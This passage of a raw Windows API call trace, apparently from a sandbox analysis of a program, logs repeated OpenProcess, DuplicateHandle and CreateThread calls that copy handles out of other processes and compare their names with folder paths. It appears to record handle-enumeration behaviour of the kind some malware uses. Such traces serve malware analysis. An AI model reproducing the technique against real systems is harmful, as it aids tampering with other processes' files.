hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.205] CloseHandle (hObject=0x670) returned 1 [0153.205] _wcsicmp (_Str1="\\Google", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -7 [0153.205] CloseHandle (hObject=0x680) returned 1 [0153.205] CloseHandle (hObject=0x62c) returned 1 [0153.205] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x310) returned 0x62c [0153.205] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.205] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.206] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.207] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.207] CloseHandle (hObject=0x670) returned 1 [0153.207] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0153.207] CloseHandle (hObject=0x680) returned 1 [0153.207] CloseHandle (hObject=0x62c) returned 1 [0153.207] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x310) returned 0x62c [0153.207] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.207] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.208] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.209] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.209] CloseHandle (hObject=0x670) returned 1 [0153.209] _wcsicmp (_Str1="\\Adobe", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -13 [0153.209] CloseHandle (hObject=0x680) returned 1 [0153.209] CloseHandle (hObject=0x62c) returned 1 [0153.209] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x48c) returned 0x62c [0153.209] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.209] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.210] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.210] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.210] CloseHandle (hObject=0x670) returned 1 [0153.210] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0153.210] CloseHandle (hObject=0x680) returned 1 [0153.211] CloseHandle (hObject=0x62c) returned 1 [0153.211] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x48c) returned 0x62c [0153.211] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.211] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.211] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.212] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.212] CloseHandle (hObject=0x670) returned 1 [0153.213] _wcsicmp (_Str1="\\Uninstall Information", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 7 [0153.213] CloseHandle (hObject=0x680) returned 1 [0153.213] CloseHandle (hObject=0x62c) returned 1 [0153.213] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x138) returned 0x62c [0153.213] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.213] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.213] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.214] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.214] CloseHandle (hObject=0x670) returned 1 [0153.214] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0153.214] CloseHandle (hObject=0x680) returned 1 [0153.214] CloseHandle (hObject=0x62c) returned 1 [0153.214] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x138) returned 0x62c [0153.214] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.214] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.215] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.216] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.216] CloseHandle (hObject=0x670) returned 1 [0153.216] _wcsicmp (_Str1="\\Uninstall Information", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 7 [0153.216] CloseHandle (hObject=0x680) returned 1 [0153.216] CloseHandle (hObject=0x62c) returned 1 [0153.216] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x524) returned 0x62c [0153.216] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.216] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.217] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.217] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.218] CloseHandle (hObject=0x670) returned 1 [0153.218] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0153.218] CloseHandle (hObject=0x680) returned 1 [0153.218] CloseHandle (hObject=0x62c) returned 1 [0153.218] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x524) returned 0x62c [0153.218] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.218] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.219] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.219] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.219] CloseHandle (hObject=0x670) returned 1 [0153.219] _wcsicmp (_Str1="\\DVD Maker", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -10 [0153.219] CloseHandle (hObject=0x680) returned 1 [0153.220] CloseHandle (hObject=0x62c) returned 1 [0153.220] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x5a8) returned 0x62c [0153.220] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.220] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.221] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.222] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.222] CloseHandle (hObject=0x670) returned 1 [0153.222] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0153.222] CloseHandle (hObject=0x680) returned 1 [0153.222] CloseHandle (hObject=0x62c) returned 1 [0153.222] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x5a8) returned 0x62c [0153.222] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.222] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.223] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.224] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.224] CloseHandle (hObject=0x670) returned 1 [0153.224] _wcsicmp (_Str1="\\Windows Portable Devices", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0153.224] CloseHandle (hObject=0x680) returned 1 [0153.224] CloseHandle (hObject=0x62c) returned 1 [0153.224] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x340) returned 0x62c [0153.224] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.224] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.228] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.228] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.228] CloseHandle (hObject=0x670) returned 1 [0153.228] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0153.229] CloseHandle (hObject=0x680) returned 1 [0153.229] CloseHandle (hObject=0x62c) returned 1 [0153.229] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x340) returned 0x62c [0153.229] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.229] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.230] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.230] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.230] CloseHandle (hObject=0x670) returned 1 [0153.230] _wcsicmp (_Str1="\\Windows Mail", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0153.230] CloseHandle (hObject=0x680) returned 1 [0153.230] CloseHandle (hObject=0x62c) returned 1 [0153.230] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x5b8) returned 0x62c [0153.231] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.231] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.231] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.232] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.232] CloseHandle (hObject=0x670) returned 1 [0153.232] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0153.232] CloseHandle (hObject=0x680) returned 1 [0153.232] CloseHandle (hObject=0x62c) returned 1 [0153.232] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x5b8) returned 0x62c [0153.232] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.232] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.233] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.233] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.233] CloseHandle (hObject=0x670) returned 1 [0153.233] _wcsicmp (_Str1="\\MSBuild", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0153.233] CloseHandle (hObject=0x680) returned 1 [0153.234] CloseHandle (hObject=0x62c) returned 1 [0153.234] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x814) returned 0x62c [0153.234] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.234] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.234] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.235] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.235] CloseHandle (hObject=0x670) returned 1 [0153.235] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0153.235] CloseHandle (hObject=0x680) returned 1 [0153.235] CloseHandle (hObject=0x62c) returned 1 [0153.235] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x814) returned 0x62c [0153.235] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.235] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.236] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.236] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.237] CloseHandle (hObject=0x670) returned 1 [0153.237] _wcsicmp (_Str1="\\Mozilla Maintenance Service", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0153.237] CloseHandle (hObject=0x680) returned 1 [0153.237] CloseHandle (hObject=0x62c) returned 1 [0153.237] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x824) returned 0x62c [0153.237] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.237] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.238] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.238] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.239] CloseHandle (hObject=0x670) returned 1 [0153.239] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0153.239] CloseHandle (hObject=0x680) returned 1 [0153.239] CloseHandle (hObject=0x62c) returned 1 [0153.239] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x824) returned 0x62c [0153.239] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.239] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.240] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.240] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.240] CloseHandle (hObject=0x670) returned 1 [0153.240] _wcsicmp (_Str1="\\Microsoft Sync Framework", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0153.240] CloseHandle (hObject=0x680) returned 1 [0153.241] CloseHandle (hObject=0x62c) returned 1 [0153.241] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x834) returned 0x62c [0153.241] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.241] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.241] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.243] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.243] CloseHandle (hObject=0x670) returned 1 [0153.243] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0153.243] CloseHandle (hObject=0x680) returned 1 [0153.243] CloseHandle (hObject=0x62c) returned 1 [0153.243] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x834) returned 0x62c [0153.243] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.243] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.244] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.244] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.244] CloseHandle (hObject=0x670) returned 1 [0153.244] _wcsicmp (_Str1="\\Microsoft Synchronization Services", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0153.244] CloseHandle (hObject=0x680) returned 1 [0153.244] CloseHandle (hObject=0x62c) returned 1 [0153.245] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x844) returned 0x62c [0153.245] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.245] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.245] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.246] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.246] CloseHandle (hObject=0x670) returned 1 [0153.246] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0153.246] CloseHandle (hObject=0x680) returned 1 [0153.246] CloseHandle (hObject=0x62c) returned 1 [0153.246] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x844) returned 0x62c [0153.246] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.246] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.247] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.248] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.248] CloseHandle (hObject=0x670) returned 1 [0153.248] _wcsicmp (_Str1="\\Windows Mail", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0153.248] CloseHandle (hObject=0x680) returned 1 [0153.248] CloseHandle (hObject=0x62c) returned 1 [0153.248] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x864) returned 0x62c [0153.248] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.248] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.249] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.249] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.250] CloseHandle (hObject=0x670) returned 1 [0153.250] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0153.250] CloseHandle (hObject=0x680) returned 1 [0153.250] CloseHandle (hObject=0x62c) returned 1 [0153.250] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x864) returned 0x62c [0153.250] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.250] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.251] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.251] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.251] CloseHandle (hObject=0x670) returned 1 [0153.251] _wcsicmp (_Str1="\\Windows Portable Devices", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0153.251] CloseHandle (hObject=0x680) returned 1 [0153.251] CloseHandle (hObject=0x62c) returned 1 [0153.252] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x874) returned 0x62c [0153.252] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.252] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.252] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.253] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.253] CloseHandle (hObject=0x670) returned 1 [0153.253] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0153.253] CloseHandle (hObject=0x680) returned 1 [0153.253] CloseHandle (hObject=0x62c) returned 1 [0153.253] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x874) returned 0x62c [0153.253] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.253] CreateThread (in: 